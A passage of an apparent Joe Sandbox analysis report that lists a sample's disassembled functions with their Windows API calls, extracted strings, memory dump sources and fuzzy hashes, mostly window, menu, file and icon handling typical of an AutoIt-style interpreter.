                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 001FB550
                                                            • GetWindowRect.USER32(00000004,?), ref: 001FB5B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: 48228b408305baa5a3d1f0268418b2f4d849715165c4b003ca9e72dec67d409d
                                                            • Instruction ID: 9006d7280abe9d89e070a9a195d5970acbedc3d7130d9ad6c2f95e87786689d1
                                                            • Opcode Fuzzy Hash: 48228b408305baa5a3d1f0268418b2f4d849715165c4b003ca9e72dec67d409d
                                                            • Instruction Fuzzy Hash: 2681BE710083099BDB14DF10C9C5FBABBE8EF54314F088569FE899A0A2DB34DE46CB61
                                                            Function 0022C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 0022C917
                                                              • Part of subcall function 0022ADF1: ClientToScreen.USER32(?,?), ref: 0022AE1A
                                                              • Part of subcall function 0022ADF1: GetWindowRect.USER32(?,?), ref: 0022AE90
                                                              • Part of subcall function 0022ADF1: PtInRect.USER32(?,?,0022C304), ref: 0022AEA0
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0022C980
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0022C98B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0022C9AE
                                                            • _wcscat.LIBCMT ref: 0022C9DE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0022C9F5
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0022CA0E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0022CA25
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0022CA47
                                                            • DragFinish.SHELL32(?), ref: 0022CA4E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0022CB41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr&
                                                            • API String ID: 169749273-31770037
                                                            • Opcode ID: 54fc40c1be624e87e74b7db8dc11cea39bb5c075d50a065c4ab524b644a41ca8
                                                            • Instruction ID: 5a63449ce1e4755a053aa05418ba946fca6dac3b90342db8132c8f29dd27c96d
                                                            • Opcode Fuzzy Hash: 54fc40c1be624e87e74b7db8dc11cea39bb5c075d50a065c4ab524b644a41ca8
                                                            • Instruction Fuzzy Hash: 0B617871108301AFC711EFA0DC89DAFBBF8EB99710F40092EF591971A1DB709A59CB62
                                                            Function 001FB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: 3a068a0f4339e028b453a990c304024c0771f7c93f472b8b67b15604a256e67b
                                                            • Instruction ID: 1521bd6d27590e0fafff1ab7c87709b4a17d9d171e9e07eb5b6bfed4c064c16f
                                                            • Opcode Fuzzy Hash: 3a068a0f4339e028b453a990c304024c0771f7c93f472b8b67b15604a256e67b
                                                            • Instruction Fuzzy Hash: AD31D435A58209E6DB14FA60CD83EFEB7A89F36751F600019F911720D1EF71AF18C595
                                                            Function 001FC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(00000063), ref: 001FC4D4
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001FC4E6
                                                            • SetWindowTextW.USER32(?,?), ref: 001FC4FD
                                                            • GetDlgItem.USER32(?,000003EA), ref: 001FC512
                                                            • SetWindowTextW.USER32(00000000,?), ref: 001FC518
                                                            • GetDlgItem.USER32(?,000003E9), ref: 001FC528
                                                            • SetWindowTextW.USER32(00000000,?), ref: 001FC52E
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001FC54F
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001FC569
                                                            • GetWindowRect.USER32(?,?), ref: 001FC572
                                                            • SetWindowTextW.USER32(?,?), ref: 001FC5DD
                                                            • GetDesktopWindow.USER32 ref: 001FC5E3
                                                            • GetWindowRect.USER32(00000000), ref: 001FC5EA
                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 001FC636
                                                            • GetClientRect.USER32(?,?), ref: 001FC643
                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 001FC668
                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001FC693
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID:
                                                            • API String ID: 3869813825-0
                                                            • Opcode ID: 0b25629cfe78206623a7eeaccf27ad5faec6695ba61427c96ce29654f67dea6e
                                                            • Instruction ID: 6bbda51f25610573bb101c60c65f405bc77c11453bda7876f505d415a48cf0df
                                                            • Opcode Fuzzy Hash: 0b25629cfe78206623a7eeaccf27ad5faec6695ba61427c96ce29654f67dea6e
                                                            • Instruction Fuzzy Hash: 9A514F71A0070DAFDB20DFA8DE89B7EBBB5FF04705F004928E696A25A0C774A945DB50
                                                            Function 0022A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0022A4C8
                                                            • DestroyWindow.USER32(?,?), ref: 0022A542
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0022A5BC
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0022A5DE
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0022A5F1
                                                            • DestroyWindow.USER32(00000000), ref: 0022A613
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001A0000,00000000), ref: 0022A64A
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0022A663
                                                            • GetDesktopWindow.USER32 ref: 0022A67C
                                                            • GetWindowRect.USER32(00000000), ref: 0022A683
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0022A69B
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0022A6B3
                                                              • Part of subcall function 001A25DB: GetWindowLongW.USER32(?,000000EB), ref: 001A25EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 1297703922-3619404913
                                                            • Opcode ID: aebd754de6ba35d363921306ee4391a2a7dbb18f6bf6bb9782e0118a8b600767
                                                            • Instruction ID: db41d9668860f65c06bf9ca02f9c504d3237e44417dbb84aae7149584701ee0b
                                                            • Opcode Fuzzy Hash: aebd754de6ba35d363921306ee4391a2a7dbb18f6bf6bb9782e0118a8b600767
                                                            • Instruction Fuzzy Hash: 1371AC71150206AFDB20CF68EC49F7677EAFB98700F08492CF995972A0C7B1E956CB52
                                                            Function 00224619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 002246AB
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002246F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: 924f8ae63c14e2d7906fdd0b2ce9d72476ec57f0eb3bad2bd2132a252447a9f0
                                                            • Instruction ID: b90f8bfca510a1c7e073cf82fb3889d31ee3fededd9e234ffb41c660bf0e1122
                                                            • Opcode Fuzzy Hash: 924f8ae63c14e2d7906fdd0b2ce9d72476ec57f0eb3bad2bd2132a252447a9f0
                                                            • Instruction Fuzzy Hash: FA919F34224712EFCB14FF60D851A7AB7A1AFA5314F00446CF8965B3A2DB70ED5ACB81
                                                            Function 0022BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0022BB6E
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00226D80,?), ref: 0022BBCA
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0022BC03
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0022BC46
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0022BC7D
                                                            • FreeLibrary.KERNEL32(?), ref: 0022BC89
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0022BC99
                                                            • DestroyIcon.USER32(?), ref: 0022BCA8
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0022BCC5
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0022BCD1
                                                              • Part of subcall function 001C313D: __wcsicmp_l.LIBCMT ref: 001C31C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 1212759294-1154884017
                                                            • Opcode ID: d23500655d9d121ab103dbd29baa26d7cb76239032a83924069bc09efbf91fd2
                                                            • Instruction ID: 5c36568856fd1f278da62060366e489c17bbbf0b8efc37bf5fd7772532ada40a
                                                            • Opcode Fuzzy Hash: d23500655d9d121ab103dbd29baa26d7cb76239032a83924069bc09efbf91fd2
                                                            • Instruction Fuzzy Hash: 3A610271910229BEEB25DFA0ED45FBE77B8EB18710F10412AFC15D60D0DB7499A0CBA0
                                                            Function 0020A0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(00000066,?,00000FFF,0022FB78), ref: 0020A0FC
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 0020A11E
                                                            • __swprintf.LIBCMT ref: 0020A177
                                                            • __swprintf.LIBCMT ref: 0020A190
                                                            • _wprintf.LIBCMT ref: 0020A246
                                                            • _wprintf.LIBCMT ref: 0020A264
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%#
                                                            • API String ID: 311963372-3349450703
                                                            • Opcode ID: 36d878aebea338d1854bcd48a435a92a6df8c66bc3b60bc972b8b314dd2e500a
                                                            • Instruction ID: e06b1325c94a06c4d12911ad619c2f1522846c665a8bedff3d03ffee48fa158f
                                                            • Opcode Fuzzy Hash: 36d878aebea338d1854bcd48a435a92a6df8c66bc3b60bc972b8b314dd2e500a
                                                            • Instruction Fuzzy Hash: 1451BE3290020ABACF15EBE0DD86EEEB779AF25300F504165F915720E2EB316F59CB61
                                                            Function 0020A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                            • CharLowerBuffW.USER32(?,?), ref: 0020A636
                                                            • GetDriveTypeW.KERNEL32 ref: 0020A683
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0020A6CB
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0020A702
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0020A730
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: e79a51bf98aecdd47cd6d82a14c8f95b0160a044738297524d96a5883008b3e7
                                                            • Instruction ID: 45b755504ef0600c59cc46b6694a2a3806e621c8e71fb9410718bc42d5f03854
                                                            • Opcode Fuzzy Hash: e79a51bf98aecdd47cd6d82a14c8f95b0160a044738297524d96a5883008b3e7
                                                            • Instruction Fuzzy Hash: D2515E751143059FC700EF20C98196AB7F8FFA9718F44896DF896572A2DB31EE0ACB52
                                                            Function 0020A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0020A47A
                                                            • __swprintf.LIBCMT ref: 0020A49C
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0020A4D9
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0020A4FE
                                                            • _memset.LIBCMT ref: 0020A51D
                                                            • _wcsncpy.LIBCMT ref: 0020A559
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0020A58E
                                                            • CloseHandle.KERNEL32(00000000), ref: 0020A599
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0020A5A2
                                                            • CloseHandle.KERNEL32(00000000), ref: 0020A5AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: a385ae6300afb4a76a940c9c5c1cb10e90d094df9f0f0f6bb3f816a15aae62b2
                                                            • Instruction ID: 5680aeb142ec7808bb93c3579bb7b50a86f9f51c7a489b4b0c639608d89891eb
                                                            • Opcode Fuzzy Hash: a385ae6300afb4a76a940c9c5c1cb10e90d094df9f0f0f6bb3f816a15aae62b2
                                                            • Instruction Fuzzy Hash: 2231B0B691020ABBDB20DFA0DC49FEB37BCEF89701F5041B6F908D21A1E77096558B25
                                                            Function 001DAB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                            • String ID:
                                                            • API String ID: 884005220-0
                                                            • Opcode ID: fce3d31fa86250435b4fd0783de8f55d8f9c646ddbf46ad9bf6eb9a38307b018
                                                            • Instruction ID: a44f34b70bca422f11607c25a9d8729b580a386884685ca42104b9a9fd471115
                                                            • Opcode Fuzzy Hash: fce3d31fa86250435b4fd0783de8f55d8f9c646ddbf46ad9bf6eb9a38307b018
                                                            • Instruction Fuzzy Hash: 59612472900205AFDB20EF64E842B6977A9EF22332F54415BE8059B3D1DB75D981C792
                                                            Function 0020DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 0020DC7B
                                                            • _wcscat.LIBCMT ref: 0020DC93
                                                            • _wcscat.LIBCMT ref: 0020DCA5
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0020DCBA
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0020DCCE
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0020DCE6
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0020DD00
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0020DD12
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: 01f8085c9ffd1c4535be86a3364c083e8fe10433b7f4b02624e5027008976a71
                                                            • Instruction ID: d79b2ab3a15f1f461d0449b807bfaf125373897e1e604a60a097d27367c1a7f6
                                                            • Opcode Fuzzy Hash: 01f8085c9ffd1c4535be86a3364c083e8fe10433b7f4b02624e5027008976a71
                                                            • Instruction Fuzzy Hash: A081D4765253429FCB20DFA4C84596EB7E8BF99304F14882EF885C7292E770DD54CB52
                                                            Function 0022C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0022C4EC
                                                            • GetFocus.USER32 ref: 0022C4FC
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0022C507
                                                            • _memset.LIBCMT ref: 0022C632
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0022C65D
                                                            • GetMenuItemCount.USER32(?), ref: 0022C67D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 0022C690
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0022C6C4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0022C70C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0022C744
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0022C779
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: c7c2509731bc0751dbe74b14af4c486cb7490a340b03c9c7b69c2bd79151d9b5
                                                            • Instruction ID: 66b9f71be6f6b90af21d3b2c37dcc8c55da2b310ba869fe83e03b9412f34acab
                                                            • Opcode Fuzzy Hash: c7c2509731bc0751dbe74b14af4c486cb7490a340b03c9c7b69c2bd79151d9b5
